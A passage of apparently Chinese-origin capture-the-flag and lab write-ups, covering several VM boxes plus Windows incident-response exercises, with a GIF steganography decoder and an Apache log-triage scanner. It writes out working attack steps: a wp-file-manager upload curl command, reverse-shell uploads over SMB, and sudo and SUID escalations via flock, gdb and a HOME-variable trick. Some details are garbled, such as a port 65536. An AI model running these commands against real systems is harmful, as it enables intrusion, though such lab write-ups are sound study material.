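    return bytes(out)


def _skip_sub_blocks(data: bytes, pos: int) -> int:
    """Advance past a chain of length-prefixed sub-blocks ending in a 0x00 block."""
    while True:
        size = data[pos]
        pos += 1
        if size == 0:
            return pos
        pos += size


def frame_delays(data: bytes) -> list:
    """Walk the block structure and collect the delay field of every graphic control extension."""
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    pos = 13
    if packed & 0x80:                        # global color table present
        pos += 3 * (2 << (packed & 0x07))
    delays = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                    # trailer
            break
        if block == 0x21:                    # extension block
            label = data[pos]
            pos += 1
            if label == 0xF9:                # GCE sub-block: size, packed, delay(2), transparent index
                delays.append(struct.unpack_from("<H", data, pos + 2)[0])
            pos = _skip_sub_blocks(data, pos)
        elif block == 0x2C:                  # image descriptor
            local_packed = data[pos + 8]
            pos += 9
            if local_packed & 0x80:          # local color table present
                pos += 3 * (2 << (local_packed & 0x07))
            pos += 1                         # LZW minimum code size
            pos = _skip_sub_blocks(data, pos)
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    return delays


def rot47(text: str) -> str:
    """ROT47 over the printable range 33..126; applying it twice is the identity."""
    return "".join(chr(33 + (ord(c) - 33 + 47) % 94) if 33 <= ord(c) <= 126 else c for c in text)


def delays_to_text(delays, padding: int = 6) -> str:
    """Drop the ordinary timing frames and read the remaining delays as ASCII codes."""
    return "".join(chr(d) for d in delays if d != padding)


def recover(gif: bytes) -> str:
    return rot47(delays_to_text(frame_delays(gif)))


if __name__ == "__main__":
    print(recover(build_gif(PAGE_DELAYS)))
```

Pixel data is never decoded, so the parser is safe to point at untrusted files for this purpose; it only needs the sub-block lengths to skip image data.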

First locate wfuzz with find:

follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find / -name "wfuzz" 2>/dev/null
/home/follower/.config/wfuzz
/usr/local/bin/wfuzz
/usr/local/lib/python3.9/dist-packages/wfuzz # this is wfuzz's module path
follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ find ./ -writable 2>/dev/null
./plugins/payloads/file.py

Looking for writable files under the wfuzz directory finds file.py; cat it:

follower@Chromee:/usr/local/lib/python3.9/dist-packages/wfuzz$ cat ./plugins/payloads/file.py
import pty
pty.spawn("/bin/bash")

No need to think: the author clearly lowered the difficulty and left the backdoor ready.

follower@Chromee:~$ /usr/local/bin/doas -u softly /usr/local/bin/wfuzz -z file -u "127.0.0.1"
Password:
/usr/local/lib/python3.9/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
softly@Chromee:/home/follower$

Upload pspy64; it shows root executing script.sh at intervals:

2025/03/21 12:53:01 CMD: UID=0     PID=1504   | /bin/sh -c /root/script.sh
2025/03/21 12:53:01 CMD: UID=0 PID=1505 | /bin/bash /root/script.sh

Combining the box name Chromee with the zeus.conf found earlier, it clearly involves the browser. Running linpeas.sh shows a debug.kdbx under /media:

┌──(root㉿kali)-[~/Desktop/tmp/test]
└─# file debug.kdbx
debug.kdbx: PDF document, version 1.7

It is a PDF file.

Searching online for this: Chrome has the built-in tool chrome://inspect/, and there is the default remote-debugging port 9222 (needed later).

First write an authorized_keys file.

The command to enable remote debugging, found online:

doas /usr/bin/chromium --headless --remote-debugging-port=9222 --no-sandbox http://127.0.0.1

Because the target has no desktop, --headless is required or it errors out. Once it is running, forward the port with socat:

softly@Chromee:~$ ./socatx64.bin TCP-LISTEN:9999,fork TCP4:127.0.0.1:9222

Connect from Chrome and open the first link.

After a moment, a request to 127.0.0.1/post.php carrying a key shows up; no base64 decoding is needed, this is root's password.

The Chromium remote-debugging port has to be the default 9222, otherwise it is not picked up, which is annoying.

Hidden user name

Before it even started, the first question was already done.

The attacker's two IP addresses

One IP is found in the remote logon records.

In the hacker user's directory there is a system.bat file, which writes a webshell into the web root; check the Apache logs for it.

And the first flag.

The second IP

Flags left behind by the hacker (3)

There is a flag in the scheduled tasks.

The web application is Z-Blog; download the backend password reset tool from the official forum:

https://bbs.zblogcn.com/thread-83419.html

There is also a hacker user.

The third flag

1. The attacker's IP addresses (two)?

The first IP is in the Apache log; the other is in the logon log and can be found directly with the windows1check tool or in Event Viewer.

2. The attacker's webshell file name?

The Apache log shows that system.php is the webshell file name.

3. The attacker's webshell password?

The password is hcak6618.

4. The attacker's fake QQ number?

As everyone knows, after a QQ login a Tencent Files folder is created under Documents by default, which records every QQ number that has logged in; FileRecv holds the files downloaded through QQ.

5. The attacker's fake server IP address?

The hacker downloaded frp through QQ; the frpc configuration file holds the fake server IP and port.

6. The attacker's server port?

65536

7. How did the attacker break in (multiple choice)?

Analysis of the FTP log shows the attacker brute-forced the FTP admin password, logged in, and then uploaded system.php.

phpStudy's FTP configuration shows the FTP root is the www directory, so the uploaded system.php is reachable over the web.

8. The attacker's hidden user name?

Learned a new trick: Win+R -> cmd -> lusrmgr.msc shows local users and groups; alternatively, the Users folder on the C: drive reveals hack887$.

Background: while on duty, Xiao Li noticed CPU usage spiking. Being timid, he immediately shut the server down and called in his buddy, who was busy eating sweet-potato skins, to help analyze it. This is his server system; find the following, which are the conditions for clearing the level:
1. The attacker's shell password
2. The attacker's IP address
3. The attacker's hidden account name
4. The mining-pool domain of the attacker's miner (domain only)
5. Those with the skill can try to fix the vulnerability

1. The attacker's shell password

Open phpStudy to find the site root, then scan it with D盾 (D-Shield).

It turns up a Behinder (冰蝎) webshell; the password is rebeyond.

2. The attacker's IP address

Check phpStudy's log files; there are Apache and Nginx logs. The Nginx logs are all 0 KB, so open Apache's access.log and search for shell.php to find the attacker's IP.
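Searching access.log by hand for shell.php, as above, and for the system.php webshell and the php://filter LFI requests from the earlier boxes, is the same triage every time; as an added example (not code from any of the writeups), here it is as a small scanner over combined-format Apache lines that groups flagged requests by source address, which is how both "attacker IP" questions are answered. The log lines are constructed samples: the 192.168.31.x addresses and the parameter, wrapper and webshell names come from the page, 203.0.113.77 is a placeholder.

```python
"""Triage Apache access-log lines for LFI attempts and webshell activity, grouped by source IP."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Combined-format request line: host ident user [time] "method path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Webshell file names from the incident-response sections of the page
WEBSHELL_NAMES = {"system.php", "shell.php"}

# Request patterns behind the LFI on port 80 (php:// wrapper, traversal, sensitive paths)
LFI_PATTERNS = (
    (re.compile(r"php://", re.I), "php stream wrapper"),
    (re.compile(r"\.\./"), "path traversal"),
    (re.compile(r"/etc/passwd", re.I), "sensitive file path"),
)

# Constructed sample log (203.0.113.77 is a placeholder address)
SAMPLE_LOG = """\
192.168.31.1 - - [26/Mar/2025:08:28:00 -0400] "GET /about.php HTTP/1.1" 200 10036
192.168.31.129 - - [26/Mar/2025:08:29:10 -0400] "GET /?hack=/etc/passwd HTTP/1.1" 200 18863
192.168.31.129 - - [26/Mar/2025:08:30:01 -0400] "GET /?hack=php://filter/convert.base64-encode/resource=secret.php HTTP/1.1" 200 4521
203.0.113.77 - - [21/Mar/2025:12:01:44 +0800] "POST /system.php HTTP/1.1" 200 31
203.0.113.77 - - [21/Mar/2025:12:01:50 +0800] "GET /system.php HTTP/1.1" 200 31
192.168.31.1 - - [21/Mar/2025:12:05:00 +0800] "GET /index.php HTTP/1.1" 200 18852
"""


def parse_line(line: str):
    """Return the named fields of one log line, or None when it is not a request line."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Reasons a request deserves a look; an empty list means nothing matched."""
    path = unquote(entry["path"])          # decode %2e%2e%2f-style encoding before matching
    reasons = [label for rx, label in LFI_PATTERNS if rx.search(path)]
    name = path.split("?", 1)[0].rsplit("/", 1)[-1]
    if name in WEBSHELL_NAMES:
        reasons.append(f"known webshell name {name}")
        if entry["method"] == "POST":
            reasons.append("POST to webshell")
    return reasons


def triage(lines) -> dict:
    """Group flagged requests by source address: {ip: [(time, path, reasons), ...]}."""
    findings = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings[entry["ip"]].append((entry["time"], entry["path"], reasons))
    return dict(findings)


def hits_per_ip(lines) -> Counter:
    """Flagged-request count per source address, the quickest way to rank suspects."""
    return Counter({ip: len(items) for ip, items in triage(lines).items()})


if __name__ == "__main__":
    for ip, items in triage(SAMPLE_LOG.splitlines()).items():
        print(ip)
        for when, path, reasons in items:
            print(f"  {when}  {path}  {reasons}")
```

On a real server the same scanner should also run over the error log and, on this phpStudy host, over the FTP log, since the page's upload path was FTP rather than HTTP.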

3. The attacker's hidden account name

Checking the users on the C: drive directly shows a hack168$.

Alternatively check the logon log; without a tool, open Event Viewer -> Security and look for events with ID 4624.

4. The mining-pool domain of the attacker's miner (domain only)

In C:\Users\hack168$\Desktop there is a Kuang, an exe compiled from Python; convert it to pyc first and then decompile it.

5. Those with the skill can try to fix the vulnerability

Start the web service in phpStudy; it is an EMGLOG service, and the backend credentials are admin/123456.

https://blog.csdn.net/W13680336969/article/details/137267677

Apply the latest patch and change the admin password.

6. Unintended

On the desktop there is a checker program for the answers; same as Kuang, exe -> pyc, then decompile.

Information gathering

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.178 08:00:27:d1:eb:7a PCS Systemtechnik GmbH
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)
192.168.31.217 b4:0f:b3:8e:31:07 vivo Mobile Communication Co., Ltd.
192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 5 responded

The IP is 192.168.31.178; scan ports with nmap:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.178 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-26 01:27 EST
Nmap scan report for helium (192.168.31.178)
Host is up (0.0046s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:D1:EB:7A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 20.85 seconds

Port 80

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.178
<title>RELAX</title>
<!doctype html>
<html lang="en">

<!-- Please paul, stop uploading weird .wav files using /upload_sound -->

<head>
<style>
body {
background-image: url('screen-1.jpg');
background-repeat: no-repeat;
background-attachment: fixed;
background-size: 100% 100%;
}
</style>
<link href="bootstrap.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>

<body>
<audio src="relax.wav" preload="auto loop" controls></audio>
</body>

The comment suggests paul may be the SSH account. relax.wav contains nothing after download, but /bootstrap.min.css actually serves a wav file, and its spectrogram in Audacity reveals dancingpassyo. Trying SSH with it: login successful.

Privilege escalation

paul@MiWiFi-RA71-srv:~$ sudo -l
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
Matching Defaults entries for paul on MiWiFi-RA71-srv:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User paul may run the following commands on MiWiFi-RA71-srv:
(ALL : ALL) NOPASSWD: /usr/bin/ln
paul@MiWiFi-RA71-srv:~$ sudo ln  -fs /bin/sh /bin/usr/ln
sudo: unable to resolve host MiWiFi-RA71-srv: No address associated with hostname
# id
uid=0(root) gid=0(root) groups=0(root)

Privilege escalation successful.

Information gathering

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.22 08:00:27:63:fe:59 PCS Systemtechnik GmbH
192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered)
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.972 seconds (129.82 hosts/sec). 4 responded

The IP is 192.168.31.22; scan ports with nmap:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.22 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 02:14 EST
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 95.30% done; ETC: 02:15 (0:00:01 remaining)
Nmap scan report for twisted (192.168.31.22)
Host is up (0.0065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
MAC Address: 08:00:27:63:FE:59 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 22.61 seconds

Port 2222 is the SSH port.

Port 80

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.22
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original" width="400" height="400">
<br>

<h1>But I prefer this one because seems different</h1>

<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">

Port 80 serves two JPG images.

Download them and check with stegseek:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# stegseek cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".


┌──(root㉿kali)-[~/Desktop/tmp]
└─# stegseek cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".

This gives two SSH username/password pairs.

Privilege escalation

Log in as markus first:

markus@MiWiFi-RA71-srv:~$ cat note.txt
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.

This hints that the id_rsa belongs to the bonita user.

Look for SUID privilege escalation:

markus@MiWiFi-RA71-srv:~$ find / -perm -u=s 2>/dev/null
/home/bonita/beroot
/usr/bin/su
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

/home/bonita/beroot looks suspicious but there is no permission to access it; log in as mateo instead:

mateo@MiWiFi-RA71-srv:~$ cat note.txt
/var/www/html/gogogo.wav

Download it and open it in Audacity: it is Morse code, which decodes to:

GO DEEPER... COME WITH ME... LITTLE RABBIT...

Not useful.

mateo@MiWiFi-RA71-srv:~$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep

getcap lists files with capabilities; tail with cap_dac_read_search can read the key:

mateo@MiWiFi-RA71-srv:~$ tail /var/cache/apt/id_rsa -n 100
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----

Log in over SSH with the key, then download beroot and analyze it in IDA.

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+1Ch] [rbp-4h] BYREF

  printf("Enter the code:\n ");
  scanf("%i", &v4);
  if ( v4 == 5880 )
  {
    setuid(0);
    setgid(0);
    system("/bin/bash");
  }
  else
  {
    puts("\nWRONG");
  }
  return 0;
}

As long as the input equals 5880, it calls setuid(0) and runs /bin/bash.

bonita@MiWiFi-RA71-srv:~$ ./beroot
Enter the code:
5880
root@MiWiFi-RA71-srv:~#

Privilege escalation complete.

Information gathering


┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.165 08:00:27:6c:16:9b PCS Systemtechnik GmbH
192.168.31.187 a6:9b:e0:2d:30:9a (Unknown: locally administered)
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.976 seconds (129.55 hosts/sec). 4 responded

The IP is 192.168.31.165; scan the ports with nmap.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.165 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 00:19 EST
Nmap scan report for vulny (192.168.31.165)
Host is up (0.049s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
33060/tcp open mysqlx
MAC Address: 08:00:27:6C:16:9B (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 28.56 seconds

A MySQL service (the X protocol on 33060) and an HTTP service are open.

Port 80

Directory scanning turns up a secret directory.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl http://192.168.31.165/secret/
Neither <b>/etc/wordpress/config-192.168.31.165.php</b> nor <b>/etc/wordpress/config-168.31.165.php</b> could be found. <br/> Ensure one of them exists, is readable by the webserver and contains the right password/username

The error points at /etc/wordpress/config-168.31.165.php, which shows this is a WordPress install, and wp-content has directory listing enabled.

Under Index of /secret/wp-content/uploads/2020/10 there is an archive, wp-file-manager-6.O.zip; this plugin has an arbitrary file upload vulnerability.

curl -F cmd=upload -F target=l1_ -F upload[]=@rev.php -XPOST "http://192.168.31.165/secret/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

Upload a reverse shell file.

Then visit http://192.168.31.165/secret/wp-content/plugins/wp-file-manager/lib/files/rev.php

to trigger the reverse shell.

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation

cd into /etc/wordpress:

www-data@vulny:/etc/wordpress$ ls
ls
config-192.168.1.122.php htaccess

The file name differs from the one reported on port 80; presumably the name shown on port 80 is derived from the IP address used in the request.

www-data@vulny:/etc/wordpress$ cat c*
cat c*
<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'wordpress');
define('DB_PASSWORD', 'myfuckingpassword');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');
?>

This gives the MySQL credentials and the WordPress path. In wp-config.php there, one comment stands out:

/* idrinksomewater */

Logging in to MySQL turns up nothing useful.

/etc/passwd shows a user adrian with a login shell; the comment is his password.

www-data@vulny:/usr/share/wordpress$ su adrian
su adrian
Password: idrinksomewater

adrian@vulny:/usr/share/wordpress$
adrian@vulny:/$ sudo -l
sudo -l
Matching Defaults entries for adrian on vulny:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User adrian may run the following commands on vulny:
(ALL : ALL) NOPASSWD: /usr/bin/flock
adrian@vulny:/$ sudo -u root /usr/bin/flock -u / /bin/bash
sudo -u root /usr/bin/flock -u / /bin/bash
root@vulny:/

Privilege escalation successful.

Information gathering

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered)
192.168.31.116 08:00:27:26:b1:6f PCS Systemtechnik GmbH
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)

The IP is 192.168.31.116; scan the ports with nmap.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.116 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 06:29 EST
Nmap scan report for hommie (192.168.31.116)
Host is up (0.00041s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:26:B1:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds

Port 80

┌──(root㉿kali)-[~/Desktop/tmp]
└─# curl 192.168.31.116
alexia, Your id_rsa is exposed, please move it!!!!!
Im fighting regarding reverse shells!
-nobody

Directory scanning on port 80 finds nothing; the only hint is that alexia's id_rsa has been exposed. Let's look at port 21.

Port 21

┌──(root㉿kali)-[~/Desktop/tmp]
└─# ftp anonymous@192.168.31.116
Connected to 192.168.31.116.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||35772|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||35347|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 113 4096 Sep 30 2020 .
drwxr-xr-x 3 0 113 4096 Sep 30 2020 ..
drwxrwxr-x 2 0 113 4096 Jan 23 06:12 .web
-rw-r--r-- 1 0 0 0 Sep 30 2020 index.html
226 Directory send OK.
ftp> cd .web
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||27864|)
150 Here comes the directory listing.
-rw-r--r-- 1 106 113 35 Jan 23 06:12 1.phtml
-rw-r--r-- 1 0 0 99 Sep 30 2020 index.html
-rw-r--r-- 1 106 113 5493 Jan 23 06:09 rev.php
226 Directory send OK.

Port 21 allows anonymous login and has a .web directory through which files can be placed into the port 80 web root, but PHP is not parsed there, so this route has to be abandoned.

tftp

Scan the UDP ports.

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.116 --min-rate=1000 -sU --top-ports 20
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-23 06:34 EST
Nmap scan report for hommie (192.168.31.116)
Host is up (0.00053s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open|filtered ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp open|filtered microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknown
MAC Address: 08:00:27:26:B1:6F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.95 seconds

The TFTP service is open; combined with the hint on port 80:

┌──(root㉿kali)-[~/Desktop/tmp]
└─# tftp 192.168.31.116
tftp> get id_rsa

This downloads alexia's id_rsa.

Log in over SSH.

Privilege escalation

Look for SUID binaries.

alexia@MiWiFi-RA71-srv:~$ find / -perm -u=s 2>/dev/null
/opt/showMetheKey
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/mount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/umount

/opt/showMetheKey is very suspicious; run it.

alexia@MiWiFi-RA71-srv:~$ /opt/showMetheKey
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----

It prints alexia's id_rsa. Pull the binary down and look at it in IDA.

int __fastcall main(int argc, const char **argv, const char **envp)
{
  setuid(0);
  setgid(0);
  system("cat $HOME/.ssh/id_rsa");
  return 0;
}
It runs cat on .ssh/id_rsa under whatever the HOME environment variable points to, and it does so as root, so changing HOME makes it read root's id_rsa instead.

alexia@MiWiFi-RA71-srv:~$ export HOME=/root
alexia@MiWiFi-RA71-srv:/home/alexia$ env
SHELL=/bin/bash
PWD=/home/alexia
LOGNAME=alexia
XDG_SESSION_TYPE=tty
HOME=/root

Running it again returns root's id_rsa; log in with it.

Information gathering

┌──(root㉿kali)-[~/Desktop/script]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:7d:7d:cf, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 a4:a9:30:df:ef:44 (Unknown)
192.168.31.77 08:00:27:2a:5f:aa PCS Systemtechnik GmbH
192.168.31.220 46:3e:62:f9:1e:fa (Unknown: locally administered)
192.168.31.187 a6:9b:e0:2d:30:9a (Unknown: locally administered)
192.168.31.85 7e:2c:58:df:4e:cb (Unknown: locally administered)

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.984 seconds (129.03 hosts/sec). 5 responded

The IP is 192.168.31.77; scan the ports with nmap.

┌──(root㉿kali)-[~/Desktop/script]
└─# nmap 192.168.31.77 --min-rate=1000 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-22 09:09 EST
Nmap scan report for connection (192.168.31.77)
Host is up (0.00064s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 08:00:27:2A:5F:AA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.11 seconds

Port 445

Port 445 is open.

Enumerate it with enum4linux.

 =================================( Share Enumeration on 192.168.31.77 )=================================


Sharename Type Comment
--------- ---- -------
share Disk
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Private Share for uploading files)
Reconnecting with SMB1 for workgroup listing.

Server Comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP CONNECTION

[+] Attempting to map shares on 192.168.31.77

//192.168.31.77/share Mapping: OK Listing: OK Writing: N/A
//192.168.31.77/print$ Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.31.77/IPC$ Mapping: N/A Listing: N/A Writing: N/A

smbclient can log in anonymously; the share contains an html directory. Uploading an arbitrary file there shows it is reachable on port 80, so upload a PHP reverse shell file.

┌──(root㉿kali)-[~/Desktop/script]
└─# smbclient //192.168.31.77/share
Password for [WORKGROUP\root]:
Anonymous login successful
smb: \> cd html\
smb: \html\>
smb: \html\> put rev.php
putting file rev.php as \html\rev.php (447.0 kb/s) (average 447.0 kb/s)
smb: \html\> exit
┌──(root㉿kali)-[~/Desktop/script]
└─# nc -lvnp 5555
listening on [any] 5555 ...
connect to [192.168.31.129] from (UNKNOWN) [192.168.31.77] 45632
Linux connection 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux
09:12:44 up 4 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

Shell received.

Privilege escalation

Use python to get a better terminal.

$  python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@connection:/$

Find SUID files.

www-data@connection:/$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/su
/usr/bin/passwd
/usr/bin/gdb
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/gpassw

gdb can be used for SUID privilege escalation.

https://gtfobins.github.io/gtfobins/gdb/

www-data@connection:/$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
<mport os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)

The effective uid is now 0 and we are in the root group; privilege escalation complete.